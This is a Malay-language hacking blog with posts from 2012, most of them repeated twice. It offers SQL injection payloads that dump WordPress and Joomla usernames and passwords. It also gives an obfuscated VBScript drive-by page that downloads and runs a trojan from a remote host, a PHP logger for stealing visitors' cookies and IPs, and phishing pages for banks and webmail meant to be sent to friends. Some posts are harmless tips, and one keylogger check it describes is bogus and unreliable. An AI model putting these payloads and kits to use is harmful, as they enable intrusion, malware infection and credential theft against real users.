Showing posts with label hacking. Show all posts
Showing posts with label hacking. Show all posts

Saturday, July 28, 2012

Kenali Wordpress dan joomla Untuk Sqli Injection

Salam sejahtera

Hari ni seth nak kongsi satu benda berkenaan dengan SQli yang ada di wordpress dan Joomla .
Sebenarnya banyak lagi bug yang terdapat di server Wordpress dan Joomla ini.

Contohnya : Arbitrary file Uploads , File Upload Vulnerablities , http Header Bugs . Xss .
kalau korang nak tahu . korang google satu satu keyword dekat atas .

Ok .

1:Wordpress

Seth nak terangkan Database untuk wordpress dahulu .

(Gambar Di atas adalah Database website ber"platform" Wordpress)

Sekarang kita akan berfikir logik untuk mencari username jika mengunakan SQLI .

Wp_User : Username dan password Disimpan

Contoh adalah :

Http://[localhost]/index.php?/p?=2


pada perimeter "p?=2" terdedah kepada Sqli injection . maka masukan exploit wordpress .

union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


Maka akan Menjadi :

Http://[localhost]/index.php?/p?=-2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_ass),7,8,9+from+wp_user--


Nanti akan keluar username dan password untuk website wordpress itu tadi .

Jangan Lupa tambah : "- dan + sebelum Exploit. Rujuk warna Merah Di atas .

Htpp://[localhost]/wp_admin/ - /wp_login.php : Halaman Admin


2:Joomla

Jom kita tengok database Joomla .
(Sila Rujuk Penerangan Di Atas untuk Jomla)


Jos_Users : Username dan password Disimpan .

Http://[localhost]/index.php?option=view=saya=2


Exploit :

+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--


Contoh:

Http://[localhost]/index.php?option=view=saya=-2+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4
,5,6,7,8,9,10+from+jos_users--


Http://[localhost]/administrator : Halaman Admin

itu sahaja .

Share ok .







Salam sejahtera

Hari ni seth nak kongsi satu benda berkenaan dengan SQli yang ada di wordpress dan Joomla .
Sebenarnya banyak lagi bug yang terdapat di server Wordpress dan Joomla ini.

Contohnya : Arbitrary file Uploads , File Upload Vulnerablities , http Header Bugs . Xss .
kalau korang nak tahu . korang google satu satu keyword dekat atas .

Ok .

1:Wordpress

Seth nak terangkan Database untuk wordpress dahulu .

(Gambar Di atas adalah Database website ber"platform" Wordpress)

Sekarang kita akan berfikir logik untuk mencari username jika mengunakan SQLI .

Wp_User : Username dan password Disimpan

Contoh adalah :

Http://[localhost]/index.php?/p?=2


pada perimeter "p?=2" terdedah kepada Sqli injection . maka masukan exploit wordpress .

union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass),7,8,9+from+wp_users--


Maka akan Menjadi :

Http://[localhost]/index.php?/p?=-2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_ass),7,8,9+from+wp_user--


Nanti akan keluar username dan password untuk website wordpress itu tadi .

Jangan Lupa tambah : "- dan + sebelum Exploit. Rujuk warna Merah Di atas .

Htpp://[localhost]/wp_admin/ - /wp_login.php : Halaman Admin


2:Joomla

Jom kita tengok database Joomla .
(Sila Rujuk Penerangan Di Atas untuk Jomla)


Jos_Users : Username dan password Disimpan .

Http://[localhost]/index.php?option=view=saya=2


Exploit :

+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4,5,6,7,8,9,10+from+jos_users--


Contoh:

Http://[localhost]/index.php?option=view=saya=-2+union+all+select+1,2,group_concat(id,0x3a,name,0x3a,username,0x3a,email,0x3a,password,0x3a,usertype),4
,5,6,7,8,9,10+from+jos_users--


Http://[localhost]/administrator : Halaman Admin

itu sahaja .

Share ok .







Sunday, May 13, 2012

Hacking : Masukan Trojan Di Dlam Blogspot [Applet] Source code



Salam Sejahatera semua

Baru hari ni saya menulis source code yang baru untuk memasukan Trojan Di Dalam Blogspot .

Bagaimana script ini berfungsi ?

Ok  script ini berfungsi secara mudah sahaja

Cuma block akses kita untuk masuk kedalam blog itu secara terus

Contoh :

Disekat oleh anti virus .

tapi script ni belum di release lagi sebab takut ada yang salah gunakan script ni  . jadi saya cuma menunjukan sedikit sahaja code ni :

<applet archive="*****" Code="msf.x.Exploit.class">

Tu sahaja kode yang dapat ditunjukan . so tnggu masa nak release sebab banyak sangat orang yang buruk perangainya . takut takut . peace




Salam Sejahatera semua

Baru hari ni saya menulis source code yang baru untuk memasukan Trojan Di Dalam Blogspot .

Bagaimana script ini berfungsi ?

Ok  script ini berfungsi secara mudah sahaja

Cuma block akses kita untuk masuk kedalam blog itu secara terus

Contoh :

Disekat oleh anti virus .

tapi script ni belum di release lagi sebab takut ada yang salah gunakan script ni  . jadi saya cuma menunjukan sedikit sahaja code ni :

<applet archive="*****" Code="msf.x.Exploit.class">

Tu sahaja kode yang dapat ditunjukan . so tnggu masa nak release sebab banyak sangat orang yang buruk perangainya . takut takut . peace


Monday, May 7, 2012

Hacking : Disable Ctrl-U ./ Ctrl-A ./ Ctrl-C

salam sejahtera semua .

Hari ni seth nak kongsi cara disable Trl dalam website ./ blog ./ forum dan deface ./

Bagaimana ? ambik kode ni

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>


macam mana korang nak guna ?

Korang cari Code ni (Ctrl+F) :

<body>

dan Gantikan dengan kode di atas dan Itu sahaja .

Untuk blog :

1. Seperti biasa Log In dulu dekat blog korag
2. Pilih template / Edit HTML dan ikut step di atas .


Itu sahaja . peace
salam sejahtera semua .

Hari ni seth nak kongsi cara disable Trl dalam website ./ blog ./ forum dan deface ./

Bagaimana ? ambik kode ni

<body oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;'>


macam mana korang nak guna ?

Korang cari Code ni (Ctrl+F) :

<body>

dan Gantikan dengan kode di atas dan Itu sahaja .

Untuk blog :

1. Seperti biasa Log In dulu dekat blog korag
2. Pilih template / Edit HTML dan ikut step di atas .


Itu sahaja . peace

Friday, May 4, 2012

Hacking : Jalankan Perl Script [Video]

Salam sejahtera

Hari ni saya nak ajar korang cara jalankan perl script . apa itu perl script dan cara untuk install?
http://static.thegeekstuff.com/wp-content/uploads/2008/12/perl-support4.gif


Rujuk sini

Video ni akan ajar korang cara jalankan perl script

Korang kena ada file macam .pl

adminfinder.pl . saya akan mengunakan local disk c:

start > Run > Cmd [enter]

Start > Cmd > [enter]

Rujuk video untuk tutorial seterusnya ok

Salam sejahtera

Hari ni saya nak ajar korang cara jalankan perl script . apa itu perl script dan cara untuk install?
http://static.thegeekstuff.com/wp-content/uploads/2008/12/perl-support4.gif


Rujuk sini

Video ni akan ajar korang cara jalankan perl script

Korang kena ada file macam .pl

adminfinder.pl . saya akan mengunakan local disk c:

start > Run > Cmd [enter]

Start > Cmd > [enter]

Rujuk video untuk tutorial seterusnya ok

Thursday, May 3, 2012

Hacking : Trojan Kenyalang Download

Salam sejahtera semua

hari ni saya nak kongsi satu virus yang seth buat sendiri .

Bernama Trojan.exe

Apakah fungi Trojan kenyalang.exe ini ? korang klik sini

Korang boleh buat untuk pembelajarang sahaja . Nanti seth yang tanggung dosa .

http://1.bp.blogspot.com/_meIJhXnAUGM/TKehoAi74wI/AAAAAAAADt0/jTn56pjGvKQ/s1600/trojanpatch1.jpg

Download Sini
Salam sejahtera semua

hari ni saya nak kongsi satu virus yang seth buat sendiri .

Bernama Trojan.exe

Apakah fungi Trojan kenyalang.exe ini ? korang klik sini

Korang boleh buat untuk pembelajarang sahaja . Nanti seth yang tanggung dosa .

http://1.bp.blogspot.com/_meIJhXnAUGM/TKehoAi74wI/AAAAAAAADt0/jTn56pjGvKQ/s1600/trojanpatch1.jpg

Download Sini

Hacking : Phising Page Collection




salam sejahera semua

Hari ni seth kongsi dengan korang page phising yang seth baru buat . akibat terlalu boring . antara page phising yang seth buat adalah



1:Blogspot



2:RHB Bank



3:My Bank


4:Gmail



5:Yahoo



ada satu yang korang kena tahu . setiap perkataan yang ada dalam folder tu nanti korang kena tukar jadi .php

Contoh yang perlu korang bagi tukar adalah file dia sendiri

Hello.txt tukar ke Hello.php
Blog.txt tukar ke blog.php dan seterusnya . buat begini kepada semua file kecuali yang sudah seth tukarkan dan password.txt

Upload kesemua file tu dalam hosting dan bagi dengan kawan korang . itu sahaja

Jangan tukar mana mana nama file !

Download Sini

P/s: //Made by Seth Erry// //Http://h4ckingtutors.blogspot.com//

Sila dibuang



salam sejahera semua

Hari ni seth kongsi dengan korang page phising yang seth baru buat . akibat terlalu boring . antara page phising yang seth buat adalah



1:Blogspot



2:RHB Bank



3:My Bank


4:Gmail



5:Yahoo



ada satu yang korang kena tahu . setiap perkataan yang ada dalam folder tu nanti korang kena tukar jadi .php

Contoh yang perlu korang bagi tukar adalah file dia sendiri

Hello.txt tukar ke Hello.php
Blog.txt tukar ke blog.php dan seterusnya . buat begini kepada semua file kecuali yang sudah seth tukarkan dan password.txt

Upload kesemua file tu dalam hosting dan bagi dengan kawan korang . itu sahaja

Jangan tukar mana mana nama file !

Download Sini

P/s: //Made by Seth Erry// //Http://h4ckingtutors.blogspot.com//

Sila dibuang

Tuesday, May 1, 2012

Hacking : IDM Optimizer [Download]

Salam sejahtera semua

Hari ni saya nak kongsi satu file untuk Internet download manager Optimizer





Cara Menggunakan IDM Optimizer:


1. Pastikan korang tutup (exit) IDM terlebih dahulu. dekat ikon tray pun korang kena close

2. Klik pada Maximize Now!

3. Restart IDM korang (buka balik IDM)

4. Selesai!

Download Sini

P/s : No keyloger . Keylogger only for lammer./Noob to me

Peace :D



Salam sejahtera semua

Hari ni saya nak kongsi satu file untuk Internet download manager Optimizer





Cara Menggunakan IDM Optimizer:


1. Pastikan korang tutup (exit) IDM terlebih dahulu. dekat ikon tray pun korang kena close

2. Klik pada Maximize Now!

3. Restart IDM korang (buka balik IDM)

4. Selesai!

Download Sini

P/s : No keyloger . Keylogger only for lammer./Noob to me

Peace :D



Hacking : Cara Remove Write Protect Di Pendrive [Update]

Salam Sejahtera Semua


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhDKvY0xDHxJpWuF1uD5HG0G2ihWhAW1DS6-AVdYL66IWcoiZH6PbL1EEj-TKsxUacEcTuK4_TTTw74gDhWezTGKXQz1s6Vc39c_ZqOr2JcKqhDVZ9xGSrrK_iJDpvdicGjrSCzweKOBY/s400/usb-pen-drive11.jpg

Hari ni saya nak ajar korang cara remove write protect dekat pendrive korang .

bagaimana ? mudah je cara nya . korang ikut je tutorial ni k

Korang buka "Regedit"

Start > Cmd > Regedit

Start > Run > Regedit

Sebelum tu korang cucuk pendrive dulu k

Lepas tu korang terus menyusur ke sini


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies

Atau :

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\session manager/Allowprotected





Lepas tu korang cari :

key nama "WriteProtect" atau "AllowProtected" dan set pada 0.

save .

Itu sahaja Done
Salam Sejahtera Semua


https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhDKvY0xDHxJpWuF1uD5HG0G2ihWhAW1DS6-AVdYL66IWcoiZH6PbL1EEj-TKsxUacEcTuK4_TTTw74gDhWezTGKXQz1s6Vc39c_ZqOr2JcKqhDVZ9xGSrrK_iJDpvdicGjrSCzweKOBY/s400/usb-pen-drive11.jpg

Hari ni saya nak ajar korang cara remove write protect dekat pendrive korang .

bagaimana ? mudah je cara nya . korang ikut je tutorial ni k

Korang buka "Regedit"

Start > Cmd > Regedit

Start > Run > Regedit

Sebelum tu korang cucuk pendrive dulu k

Lepas tu korang terus menyusur ke sini


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies

Atau :

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\session manager/Allowprotected





Lepas tu korang cari :

key nama "WriteProtect" atau "AllowProtected" dan set pada 0.

save .

Itu sahaja Done

Hacking : Cara Setting IDM untuk Full Speed

Salam Sejahtera

         Hari NI Seth Nak ajar korang Setting IDM untuk Full speed pada download korang .

kadang kadang kalau korang dah low speed tu . memang tak dapat la kot nak setting .

So harini seth nak ajar korag cara setting IDM untuk sedut 95% internet connection . munkin lepas ni bila korang tengah download memang tak dapat online .

Bagaimana ?

Ok . Korang kena buka IDM korang dan klik "options pada Menu Ikon"

 Dan akan Keluar macam gambar dekat atas tu .

Korang nampak tak "connection Type/Speed"?

Korang tukarkan ke "LAN 10Mbs" dan pada Bps korang masukan "10000000000"

P/s(kalau automatik biarkan)

Step kedua .

Korang nampak "Default max. conn . number" Korang tukar kepada "16"

Step Ketiga .

Korang Tekan Run dan Taip "Regedit"

Start > Run > Regedit

Start > Cmd > Regedit

Lepas tu korang masuk ke :

HKEY_CURRENT_USER > SOFTWARE > DOWNLOAD MANAGER >

Klik pada Download manager tu
Maka akan keluar satu list yang banyak

lepas tu korang akan nampak ConnectionSpeed .

Klik pada connectionSpeed tersebut dan tukar kepada Decimal Dan masukan Value data sebanyak 999999999 (9x)
(fffffffff)

Close dah siap . cuba korang download . Dan tengok connection .

Itu sahaja . peace 










Salam Sejahtera

         Hari NI Seth Nak ajar korang Setting IDM untuk Full speed pada download korang .

kadang kadang kalau korang dah low speed tu . memang tak dapat la kot nak setting .

So harini seth nak ajar korag cara setting IDM untuk sedut 95% internet connection . munkin lepas ni bila korang tengah download memang tak dapat online .

Bagaimana ?

Ok . Korang kena buka IDM korang dan klik "options pada Menu Ikon"

 Dan akan Keluar macam gambar dekat atas tu .

Korang nampak tak "connection Type/Speed"?

Korang tukarkan ke "LAN 10Mbs" dan pada Bps korang masukan "10000000000"

P/s(kalau automatik biarkan)

Step kedua .

Korang nampak "Default max. conn . number" Korang tukar kepada "16"

Step Ketiga .

Korang Tekan Run dan Taip "Regedit"

Start > Run > Regedit

Start > Cmd > Regedit

Lepas tu korang masuk ke :

HKEY_CURRENT_USER > SOFTWARE > DOWNLOAD MANAGER >

Klik pada Download manager tu
Maka akan keluar satu list yang banyak

lepas tu korang akan nampak ConnectionSpeed .

Klik pada connectionSpeed tersebut dan tukar kepada Decimal Dan masukan Value data sebanyak 999999999 (9x)
(fffffffff)

Close dah siap . cuba korang download . Dan tengok connection .

Itu sahaja . peace 










Saturday, April 28, 2012

Hacking : Cara Bypass Captcha (Addon)

Salam sejahtera semua
Hari ni seth nak ajar korang cara bypass captcha seperti gambar di atas dengan mengunakan firefox addons
Website yang dapat Bypas adalah :
 Rapidshare.com
zShare.net
MediaFire.com
Megaupload.com
Sharebee.com
Depositfiles.com
Sendspace.com
Divshare.com
Linkbucks.com
Uploaded.to
Hotfiles.com
4shared.com
Limelinx.com
Link-Protector.com ./ Etc

Download Sini ( firefox addons )
Salam sejahtera semua
Hari ni seth nak ajar korang cara bypass captcha seperti gambar di atas dengan mengunakan firefox addons
Website yang dapat Bypas adalah :
 Rapidshare.com
zShare.net
MediaFire.com
Megaupload.com
Sharebee.com
Depositfiles.com
Sendspace.com
Divshare.com
Linkbucks.com
Uploaded.to
Hotfiles.com
4shared.com
Limelinx.com
Link-Protector.com ./ Etc

Download Sini ( firefox addons )

Hacking : Cara Delete Cache dalam firefox

Bagaiman nak remove cache dalam firefox browser ?



http://documentation.magnolia-cms.com/modules/cache/paragraphs/0/attachment9/cache-configuration.png


Salam sejahtera semua

          hari ni seth nak ajar korang cara buang cache di dalam browser firefox korang . Kenapa ? dan apakah itu cache ? Ikut kesimpulan  saya sendiri .

Cache adalah satu file di mana dia akan menyimpan sementara data data yang telah dibuat seperti kalau korang dan login kedalam facebook . cache akan menyimpan username ./ password ./ history ./ etc

Kenapa korang kena delete ? kalau korang tak delete cache ./ nanti ada pulak kawan korang yang nak cri data sentitive korang seperti akaun bank ./ akaun facebook dan lain lain


*Klik 'Tools'

*Pilih 'Options' , pilih 'Privacy'

*Pada ruangan 'History', setkan bahagian 'Firefox will:' kepada Use custom settings for history.

*Klik kotak semakan untuk Clear history when Firefox closes.

*Klik pada Settings, akan dipapar satu tetingkap Settings for Clearing History.

*Klik pada kotak semakan untuk ruangan 'Cache'.

*Klik 'OK' dan klik sekali lagi 'OK'
Done :D




Bagaiman nak remove cache dalam firefox browser ?



http://documentation.magnolia-cms.com/modules/cache/paragraphs/0/attachment9/cache-configuration.png


Salam sejahtera semua

          hari ni seth nak ajar korang cara buang cache di dalam browser firefox korang . Kenapa ? dan apakah itu cache ? Ikut kesimpulan  saya sendiri .

Cache adalah satu file di mana dia akan menyimpan sementara data data yang telah dibuat seperti kalau korang dan login kedalam facebook . cache akan menyimpan username ./ password ./ history ./ etc

Kenapa korang kena delete ? kalau korang tak delete cache ./ nanti ada pulak kawan korang yang nak cri data sentitive korang seperti akaun bank ./ akaun facebook dan lain lain


*Klik 'Tools'

*Pilih 'Options' , pilih 'Privacy'

*Pada ruangan 'History', setkan bahagian 'Firefox will:' kepada Use custom settings for history.

*Klik kotak semakan untuk Clear history when Firefox closes.

*Klik pada Settings, akan dipapar satu tetingkap Settings for Clearing History.

*Klik pada kotak semakan untuk ruangan 'Cache'.

*Klik 'OK' dan klik sekali lagi 'OK'
Done :D




Friday, April 27, 2012

Hacking : defacement dengan Trojan/malware dan Virus

Salam Sejahtera semua .http://upload.wikimedia.org/wikipedia/en/thumb/2/22/Distorted_waveforms_square_sine.svg/353px-Distorted_waveforms_square_sine.svg.png

Saya tidak bertanggung jawap atas apa apa kerosakan yang berlaku

agree ? Good

Free Download trojan aku bagi dengan korang ..

apa yang akan berlaku jika korang buka html ni :
1. anda akan ridirect ke malware website
2:anda akan download kenyalang.exe
3:anti virus akan block html ni


Apakah itu kenyalang.exe ?

Kenyalang .exe adalah File yang Saya buat ./ apa bila file tersebut dibuka ./ tast manager akan disable ./ dan faham faham lah korang .


         Hari Ni seth nak ajar korang cara membuat defacement yang akan detect Malware,virus dan Trojan

DI dalam defacement Korang.


Code di bawah korang masukan di dalam HTML korang . 


<iframe src="http://gumblar.cn/">

 Dan untuk kode dibawah korang letak di antara

<head> dan </head>

<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">

Contoh Source code yang sudah selesai di gabungkan :

<HTML>
<iframe src="http://gumblar.cn/">
<BODY>
<script language="VBScript">
on error resume next
dl = "www.yoursite.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">
</script>
</BODY>
</HTML>

(save as .html)

Satu Peringatan ./ pada tulisan Hijau yang bertulis  www.yoursite.com/trojan.exe ./  k
Korangupload kenyalang.exe di mana mana filehosting dan masukan di www.yoursite.com/trojan.exe di dalam kode html itu tadi


Kenyalang.exe adalah trojan. korang dilarang untuk membukanya ./ kecuali korang tahu apa yang korang buat


Salam Sejahtera semua .http://upload.wikimedia.org/wikipedia/en/thumb/2/22/Distorted_waveforms_square_sine.svg/353px-Distorted_waveforms_square_sine.svg.png

Saya tidak bertanggung jawap atas apa apa kerosakan yang berlaku

agree ? Good

Free Download trojan aku bagi dengan korang ..

apa yang akan berlaku jika korang buka html ni :
1. anda akan ridirect ke malware website
2:anda akan download kenyalang.exe
3:anti virus akan block html ni


Apakah itu kenyalang.exe ?

Kenyalang .exe adalah File yang Saya buat ./ apa bila file tersebut dibuka ./ tast manager akan disable ./ dan faham faham lah korang .


         Hari Ni seth nak ajar korang cara membuat defacement yang akan detect Malware,virus dan Trojan

DI dalam defacement Korang.


Code di bawah korang masukan di dalam HTML korang . 


<iframe src="http://gumblar.cn/">

 Dan untuk kode dibawah korang letak di antara

<head> dan </head>

<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">

Contoh Source code yang sudah selesai di gabungkan :

<HTML>
<iframe src="http://gumblar.cn/">
<BODY>
<script language="VBScript">
on error resume next
dl = "www.yoursite.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
<meta HTTP-EQUIV="REFRESH" content="3; url=http://wikipaste.eu/">
</script>
</BODY>
</HTML>

(save as .html)

Satu Peringatan ./ pada tulisan Hijau yang bertulis  www.yoursite.com/trojan.exe ./  k
Korangupload kenyalang.exe di mana mana filehosting dan masukan di www.yoursite.com/trojan.exe di dalam kode html itu tadi


Kenyalang.exe adalah trojan. korang dilarang untuk membukanya ./ kecuali korang tahu apa yang korang buat


Thursday, April 26, 2012

Hacking : Pengumpul maklumat dalam php







Salam Sejahtera semua .

       Hari ni seth nak ajar korang cara nak mendapatkan maklumat magsa kita dengan mengunakan ./ php script

Macam biasa korang kena upload dalam webhosting .

save as .php 


<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="cc.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie "); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?>


Lepas tu korang buat satu file text dengan nama :

Cc.txt

Sekarang korang suruh kawan korang klik link .php tu . maka segala infomation yang dia sedanggunakan untuk online akan disimpan dalam cc.txt

Itu sahaja . Done . Peace






Salam Sejahtera semua .

       Hari ni seth nak ajar korang cara nak mendapatkan maklumat magsa kita dengan mengunakan ./ php script

Macam biasa korang kena upload dalam webhosting .

save as .php 


<?php function GetIP() { if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) $ip = getenv("HTTP_CLIENT_IP"); else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) $ip = getenv("HTTP_X_FORWARDED_FOR"); else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) $ip = getenv("REMOTE_ADDR"); else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown")) $ip = $_SERVER['REMOTE_ADDR']; else $ip = "unknown"; return($ip); } function logData() { $ipLog="cc.txt"; $cookie = $_SERVER['QUERY_STRING']; $register_globals = (bool) ini_get('register_gobals'); if ($register_globals) $ip = getenv('REMOTE_ADDR'); else $ip = GetIP(); $rem_port = $_SERVER['REMOTE_PORT']; $user_agent = $_SERVER['HTTP_USER_AGENT']; $rqst_method = $_SERVER['METHOD']; $rem_host = $_SERVER['REMOTE_HOST']; $referer = $_SERVER['HTTP_REFERER']; $date=date ("l dS of F Y h:i:s A"); $log=fopen("$ipLog", "a+"); if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog)) fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie "); else fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n"); fclose($log); } logData(); ?>


Lepas tu korang buat satu file text dengan nama :

Cc.txt

Sekarang korang suruh kawan korang klik link .php tu . maka segala infomation yang dia sedanggunakan untuk online akan disimpan dalam cc.txt

Itu sahaja . Done . Peace

Wednesday, April 25, 2012

Cewah Hacking : Komputer anda ada keylogger ?

salam Sejahtera semua

Hari ni seth nak ajar korang cara nak melihat ada tak keylogger dalam komputer korang .
Macam mana ?

Korang buka CMD .

Bagaimana ?

Start > Run > CMD > [Enter]

Start > Command Prompt [Enter]

Lepas tu korang taip ni :

Dir [ Enter ]

(Rujuk Gambar dibawah)


Korang akan nampak macam gambar di atas .

Korang tengok garisan . sekarang korang salin ip tu ke dalam notepad

dan ulang langkah yang sama sebanyak 5 kali.

kalau number tersebut berubah maksutnya komputer korang ada keylogger .

cara remove ? Klik sini

Done. itu sahaja .
salam Sejahtera semua

Hari ni seth nak ajar korang cara nak melihat ada tak keylogger dalam komputer korang .
Macam mana ?

Korang buka CMD .

Bagaimana ?

Start > Run > CMD > [Enter]

Start > Command Prompt [Enter]

Lepas tu korang taip ni :

Dir [ Enter ]

(Rujuk Gambar dibawah)


Korang akan nampak macam gambar di atas .

Korang tengok garisan . sekarang korang salin ip tu ke dalam notepad

dan ulang langkah yang sama sebanyak 5 kali.

kalau number tersebut berubah maksutnya komputer korang ada keylogger .

cara remove ? Klik sini

Done. itu sahaja .

Tuesday, April 24, 2012

Cewah Hacking : Cara Buat Folder yang tidak dapat di Delete / Etc

Salam Sejahtera semua

Hari ni seth nak ajar korang cara buat folder yang korang yang tak dapat Delete ./ Rename ./ Move ./ Copy ./ paste ./ what ever .

So macam mana nak buat ? apa yang korang perlu lakukan ?

Ok . pertama kali korang buka command Prompt (cmd)

Start > Run > Cmd > [Enter] .

Start > Cmd > Command Prompt

Lepas tu dalam command Prompt taip ni

1. OK. Contoh korang nak buat dalam Disk D,

2. Buka Command Prompt (cmd), Lalu Taip D:, [Enter]

3. Kalau Korang dah dalam dir D:\> Taip md \lpt1\\ Lepas tu tekan [Enter]

(rujuk gambar Dibawah)


Peringatan : lpt1 hanya Boleh mengunakan nama itu sahaja . korang tak boleh nak tukar kepada nama yang lain

Ok . selepas korang tekan enter . Di dalam local disk D: akan tercipta satu folder yang bernama Ipti .

Untuk memasukan File ke dalam folder ni . korang cuma boleh memasukan ke dalam folder tsb . Right klik dan new ./ Notepad ./ Folder ./ Etc .

Ok . Untuk folder ni . korang kena taip ni di dalam CMD

D:\> taip rd \lpt1\\ dan [Enter]

Itu sahaja .

p/s : Sebelum korang delete folder ni . korang kena delete semua file yang ada folder tu

Ada masaalah ? Contact Saya dekat Facebook : Seth Erry
Salam Sejahtera semua

Hari ni seth nak ajar korang cara buat folder yang korang yang tak dapat Delete ./ Rename ./ Move ./ Copy ./ paste ./ what ever .

So macam mana nak buat ? apa yang korang perlu lakukan ?

Ok . pertama kali korang buka command Prompt (cmd)

Start > Run > Cmd > [Enter] .

Start > Cmd > Command Prompt

Lepas tu dalam command Prompt taip ni

1. OK. Contoh korang nak buat dalam Disk D,

2. Buka Command Prompt (cmd), Lalu Taip D:, [Enter]

3. Kalau Korang dah dalam dir D:\> Taip md \lpt1\\ Lepas tu tekan [Enter]

(rujuk gambar Dibawah)


Peringatan : lpt1 hanya Boleh mengunakan nama itu sahaja . korang tak boleh nak tukar kepada nama yang lain

